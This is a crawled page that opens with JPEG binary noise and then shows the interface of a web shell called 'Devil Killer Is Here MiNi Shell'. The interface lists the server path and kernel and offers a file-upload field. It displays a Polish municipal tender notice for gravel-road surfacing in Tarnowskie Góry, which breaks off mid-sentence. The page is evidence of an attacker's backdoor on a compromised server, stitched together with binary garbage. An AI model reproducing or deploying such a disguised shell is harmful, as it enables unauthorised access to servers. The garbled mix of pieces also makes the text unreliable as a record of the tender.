JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250620/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20250620/0028675501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Powierzchniowe utrwalenie dróg gruntowych <br/>na terenie Gminy Tarnowskie Góry w 2025 roku” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA TARNOWSKIE GÓRY</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Miejski Zarząd Ulic i Mostów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 273009357</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Piastowska 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tarnowskie Góry</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(032) 285-22-03</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mzuimzp@mzuimtg.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.mzuim.tarnowskiegory.nv.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Powierzchniowe utrwalenie dróg gruntowych <br/>na terenie Gminy Tarnowskie Góry w 2025 roku” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d2b25c5d-37ab-4a06-b211-57d364c4a681</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00286755</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00034843/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.9 Powierzchniowe utrwalenie dróg gruntowych na terenie Gminy Tarnowskie Góry w 2025 roku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mzuimtg.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://mzuimtg.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W przedmiotowym postępowaniu komunikacja między Zamawiającym, a Wykonawcami odbywa się wyłącznie przy użyciu następujących środków komunikacji elektronicznej:<br/>1.1.	Platformy	do	obsługi	postępowań	przetargowych,	dostępnej	pod	adresem:<br/>https://mzuimtg.ezamawiajacy.pl<br/>1.2.	Wymagania techniczne związane z korzystaniem z Platformy przetargowej – wskazane są na stronie internetowej Platformy przetargowej – pod adresem: https://bip.mzuim.tarnowskiegory.nv.pl (zakładka „Zamówienia publiczne”)<br/>1.3.	Wsparcia technicznego w zakresie działania Platformy przetargowej udziela jej dostawca, to jest Otwarty Rynek Elektroniczny S.A. ul. Domaniewska 49, 02-672 Warszawa, nr telefonu infolinii +48 22 257 22 23, e-mail: oneplace@marketplanet.pl od poniedziałku do piątku <br/>(dni robocze) w godz. 9:00 - 17:00.<br/>2.	Rejestracja i korzystanie z Platformy jest bezpłatne. Dokonując rejestracji Wykonawca akceptuje regulamin korzystania z Platformy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna z art. 13 RODO w celu związanym z<br/> postępowaniem o udzielenie zamówienia publicznego: Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/> Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/> przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy<br/> 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”,<br/> MZUiM w Tarnowskich Górach informuje, że: • administratorem Pani/Pana danych osobowych jest Dyrektor<br/> MZUiM Tarnowskie Góry, Adres: ul. Piastowska 8, 42-600 Tarnowskie Góry; e-mail: mzuim@mzuimtg.pl, Tel.<br/> (32) 285 22 03 Inspektor Ochrony Danych Osobowych MZUiM; Pan Andrzej Strycharz Kontakt mailowy:<br/> biuro@e-direction.pl Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w<br/> celu związanym z postępowaniem o udzielenie zamówienia publicznego na zadanie MZUiM.263.6.2025.TP2.RB<br/> pn.: Naprawa nawierzchni jezdni ulicy Stalmacha w Tarnowskich Górach prowadzonym w trybie podstawowym<br/> art. 275 pkt 2. • odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona<br/> zostanie dokumentacja postępowania w oparciu o art. 12 oraz art. 71-82 ustawy z dnia 11 września 2019 r. <br/>Prawo zamówień publicznych (Dz. U. z 2024r. poz.1320) dalej „ustawa Pzp”; • Pani/Pana dane osobowe będą<br/> przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o<br/> udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/> trwania umowy; • obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących<br/> jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o<br/> udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; •<br/> w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany,<br/> stosowanie do art. 22 RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie przysługuje Pani/Panu: − w związku z art. 17 ust. 3 lit. b, d<br/> lub e RODO prawo do usunięcia danych osobowych; − prawo do przenoszenia danych osobowych, o którym<br/> mowa w art. 20 RODO; − na podstawie art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych,<br/> gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. Wystąpienie<br/> z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/579 nie ogranicza przetwarzania danych<br/> osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego. W trakcie oraz po<br/> 2025-06-06 Biuletyn Zamówień Publicznych<br/> Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane<br/>Ogłoszenie nr 2025/BZP 00265390/01 z dnia 2025-06-06<br/> zakończeniu postępowania o udzielenie zamówienia publicznego, w przypadku gdy wykonanie obowiązków,<br/> Strona 2<br/> o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679 wymagałoby niewspółmiernie dużego wysiłku,<br/> zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających w<br/> szczególności na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia. 2.<br/> Zamawiający wprowadza w formularzu oferty oświadczenie Wykonawcy następującej treści: Oświadczam/my, że<br/> wypełniłem/liśmy obowiązki informacyjne przewidziane w art. 13 lub art. 14 RODO wobec osób fizycznych, od<br/> których dane osobowe bezpośrednio lub pośrednio pozyskałem w celu ubiegania się o udzielenie zamówienia<br/> publicznego w niniejszym postępowaniu</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MZUiM.263.7.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.	Przedmiotem zamówienia jest: wykonanie robót budowlanych polegających na powierzchniowym utrwaleniu dróg gruntowych na terenie Gminy Tarnowskie Góry w 2025 roku.<br/>a)	Naprawy dróg gruntowych - mechaniczne profilowanie i zagęszczenie drogi gruntowej <br/>– 1 300 m2,<br/>b)	Wykonanie koryta na głębokość 10 cm – 3 200 m2,<br/>c)	Wzmocnienie istniejącej nawierzchni z przygotowaniem do wykorzystania jako podbudowy przy użyciu kruszywa kamiennego naturalnego łamanego stabilizowanego mechanicznie - grubość warstwy po zagęszczeniu 10 cm – 3 200 m2,<br/>d)	Powierzchniowe utrwalenie (dwie warstwy) nawierzchni nieulepszonej przy użyciu asfaltu drogowego oraz grysów kamiennych frakcji 12-16 mm (warstwa dolna) i 5-8 mm (warstwa górna) o łącznej grubości 2,5-3,0 cm – 4 500 m2,<br/>e)	Remont cząstkowy nawierzchni powierzchniowo utrwalonej przy użyciu grysów - wyboje o głębokości - 700 m2,<br/>UWAGA 3:<br/>Orientacyjne zakresy (ilości) robót dla poszczególnych pozycji podane w tabeli formularza ofertowego (kolumna 3) stanowiącego załącznik numer 1a do SWZ mają charakter wyłącznie pomocniczy do oszacowania cen jednostkowych.<br/>UWAGA 4:<br/>Zamawiający zastrzega możliwość zwiększenia, bądź zmniejszenia orientacyjnego zakresu robót (ilości) wskazanego w formularzu ofertowym (w kolumnie numer 3) dla poszczególnych pozycji. <br/>UWAGA 5:<br/>Zwiększenie, bądź zmniejszenie zakresu procentowego robót dla poszczególnych pozycji <br/>w stosunku do orientacyjnego zakresu robót wskazanego w formularzu ofertowym stanowiącym załącznik numer 1a do SWZ, nie spowoduje zmiany maksymalnego wynagrodzenia Wykonawcy za wykonanie całości przedmiotu umowy określonego w § 3 umowy (Wynagrodzenie).<br/>UWAGA 6: <br/>Szczegółowa technologia i sposób wykonania robót według własnej kalkulacji cenowej <br/>w oparciu o Szczegółowe Specyfikacje Techniczne.<br/><br/>3.	Szczegółowy opis przedmiotu zamówienia: <br/>3.1.	Załącznik SST do SWZ – Szczegółowe Specyfikacje Techniczne (SST) <br/>3.2.	Załącznik numer 1a do SWZ Formularz ofertowy - Tabela kalkulacja cenowa, <br/>3.3.	Załącznik numer 2 do SWZ – Projektowane postanowienia umowy (PPU). <br/>Opis przedmiotu zamówienia zawarty jest w dokumentacji obejmującej specyfikację techniczną wykonania i odbioru robót budowlanych oraz przedmiar robót, stanowiące integralną część niniejszej SWZ.<br/>4.	Warunki prowadzenia robót:<br/>4.1.	Roboty prowadzone będą zgodnie z dokumentacją obejmującą specyfikację techniczną wykonania i odbioru robót budowlanych oraz przedmiarem robót jak wyżej.<br/>4.2.	Wykonawca ma obowiązek zorganizować i przeprowadzić roboty w sposób bezpieczny, niestwarzający zagrożenia dla osób przebywających na terenie robót.<br/>4.3.	Do zakresu i obowiązków Wykonawcy przedmiotu zamówienia w ramach ceny wchodzić będzie w szczególności:<br/>a)	ewentualne zasilanie, organizacja i zagospodarowania placu budowy wraz <br/>z zapleczem budowy oraz ponoszenie kosztów zużycia wody, energii elektrycznej, ogrzewania dla potrzeb budowy,<br/>b)	wprowadzenie i utrzymanie tymczasowej organizacji ruchu w trakcie prowadzenia robót oraz zabezpieczenie i wygrodzenie miejsca prowadzenia robót i terenu przed dostępem osób trzecich, roznoszeniem się pyłu, kurzu, które należy wykonać przed rozpoczęciem robót,<br/>c)	nadzór nad mieniem i ubezpieczenie budowy, prowadzenie robót w sposób bezpieczny,<br/>d)	utrzymanie porządku w trakcie realizacji robót, systematyczne porządkowanie miejsc wykonywania prac oraz uporządkowanie po zakończeniu robót,<br/>e)	ponoszenie kosztów dowozu, składowania i utylizacji odpadów z uwzględnieniem miejsca i odległości składowania,<br/>f)	natychmiastowe usunięcie w sposób docelowy i skuteczny wszelkich szkód <br/>i awarii spowodowanych przez wykonawcę w trakcie realizacji robót,<br/>g)	demontaż obiektów tymczasowych,<br/>h)	uporządkowanie terenu po zakończeniu robót,<br/>i) uczestniczenie w wyznaczonych przez Zamawiającego spotkaniach w celu omówienia spraw związanych z realizacją przedmiotu umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 13.	PRAWO OPCJI<br/>a)	Zamawiający może skorzystać z prawa opcji w zakresie robót stanowiących przedmiot zamówienia.<br/>b)	Zamawiający przewiduje, że korzystanie z opcji będzie polegało na zwiększeniu ilości prac związanych z wykonaniem robót budowlanych polegających na powierzchniowym utrwaleniu dróg gruntowych na terenie Gminy Tarnowskie Góry w 2025 roku. <br/>w stosunku do zamówienia podstawowego. <br/>c)	Skorzystanie z prawa opcji nie stanowi zmiany umowy, ani zawarcia umowy dodatkowej.<br/>d)	Realizacja prac w ramach prawa opcji może być zlecona w trakcie trwania umowy <br/>w całości lub w części.<br/>e)	Zlecanie realizacji robót remontowych w ramach zakresu opcjonalnego może nastąpić po spełnieniu łącznie następujących przesłanek to jest:<br/>- uzyskania przez Zamawiającego środków finansowych, które może przeznaczyć na realizację prawa opcji;<br/>- po zleceniu lub wykorzystaniu minimum 70% całej wartości zamówienia określonej <br/>w § 3 ust. 1 umowy i w zakresie danej pozycji po wykorzystaniu wartości danej pozycji.<br/>- po wykorzystaniu 100% wartości danej pozycji<br/>f)	Skorzystanie przez Zamawiającego z prawa opcji (w przypadku jego uruchomienia) będzie polegało na przekazaniu przez Zamawiającego Wykonawcy pisemnego oświadczenia o uruchomieniu prawa opcji łącznie ze zleceniem realizacji prac w ramach zakresu opcjonalnego, na warunkach określonych w umowie.<br/>g)	Realizacja robót w zakresie opcjonalnym będzie odbywać się na zasadach wynikających <br/>z umowy.<br/>h)	Termin realizacji w zakresie opcjonalnym (w przypadku jego uruchomienia):<br/>- od daty złożenia oświadczenia Zamawiającego o skorzystaniu z prawa opcji do dnia wskazanego w tym oświadczeniu, jednak nie później niż w terminie określonym w § 2 ust. 1 niniejszej umowy dotyczącym terminu realizacji umowy.<br/>i)	Wykonawcy nie przysługuje prawo domagania się realizacji zamówienia w zakresie prawa opcji, jeżeli Zamawiający nie skorzysta z przedmiotowego prawa.<br/>j)	Nieskorzystanie przez Zamawiającego z prawa opcji nie wymaga podania przyczyny i nie stanowi podstawy do dochodzenia względem niego odpowiedzialności z tytułu niewykonania umowy.<br/>k)	Zlecanie realizacji prac w ramach zakresu opcjonalnego może, ale nie musi nastąpić, w zależności od zapotrzebowania Zamawiającego oraz dostępnych środków finansowych.<br/>l)	W przypadku nieskorzystania przez Zamawiającego z prawa opcji, Wykonawcy nie przysługują żadne roszczenia z tego tytułu.<br/>m)	Prawo opcji służy Zamawiającemu jako zastrzeżenie jednostronnego uprawnienia do zmiany zakresu świadczenia, które zostało przewidziane w dokumentach zamówienia, w sposób wynikający z warunków zamówienia.<br/>n)	Ewentualne skorzystanie przez Zamawiającego z prawa opcji będzie polegało na przekazaniu przez Zamawiającego Wykonawcy pisemnego oświadczenia w przedmiocie skorzystania <br/>z tego prawa ze zlecaniem realizacji prac w ramach zakresu opcjonalnego realizacji zamówienia, na warunkach określonych w niniejszej umowie.<br/>o)	Realizacja prac w zakresie opcjonalnym będzie odbywać się jak na pozostałych zasadach wynikających z umowy.<br/>p)	Skorzystanie przez Zamawiającego z prawa opcji jest uzależnione od zabezpieczenia środków finansowych w planie finansowym jednostki. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 5.	Zdolność techniczna lub zawodowa:<br/>5.1.	Wykonawca musi wykazać, iż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, roboty budowlane, odpowiadające rodzajem przedmiotowi niniejszego zamówienia, w tym: wykonał w sposób należyty, zgodnie z przepisami prawa budowlanego i prawidłowo ukończył co najmniej dwie roboty budowlane o złożoności porównywalnej z zakresem niniejszego zamówienia, które zostały odebrane protokołem częściowym lub końcowym o wartości co najmniej 200 000,00 zł netto każda. <br/>UWAGA 1:<br/>Treść tego warunku w istocie wyraża wymaganie, by wykonawca co najmniej dwukrotnie wykonał każde z ww. przedsięwzięć, o określonej powyżej charakterystyce. Dla Zamawiającego miarą wiedzy i doświadczenia w ramach niniejszego warunku zdolności<br/>technicznej lub zawodowej jest bowiem nie tylko wykonanie określonych powyżej robót budowlanych, ale przede wszystkim niezakłócone - co najmniej dwukrotne - powtórzenie każdej z ww. robót budowlanych [przedsięwzięcia].<br/>5.2.	dysponuje co najmniej 1 osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej w co najmniej ograniczonym zakresie lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów.<br/>UWAGA 2:<br/>Mając na uwadze art. 117 ust. 1 ustawy P.z.p. Zamawiający zastrzega, że w sytuacji składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz analogicznie <br/>w sytuacji, gdy Wykonawca będzie polegał na zasobach innego podmiotu, na zasadach określonych w art. 118 ustawy, warunek 5.1 albo 5.2, musi zostać spełniony w całości przez Wykonawcę (jednego z Wykonawców wspólnie składającego ofertę) lub podmiot, na którego zdolności w tym zakresie powołuje się Wykonawca – brak możliwości tzw. sumowania zasobów w zakresie doświadczenia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie żąda podmiotowych środków dowodowych na wykazanie braku podstaw wykluczenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.1.	Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania spełniania warunków udziału w postępowaniu na podstawie art. 274 ust. 1 ustawy P.z.p. zostanie wezwany do złożenia następujących podmiotowych środków dowodowych (aktualnych na dzień ich złożenia): zgodnie z rozdziałem XXI SWZ pkt. 5.1 i 5.2<br/>-	w celu wykazania spełniania warunku<br/>wykaz robót budowlanych (załącznik numer 5 do SWZ) wykonanych 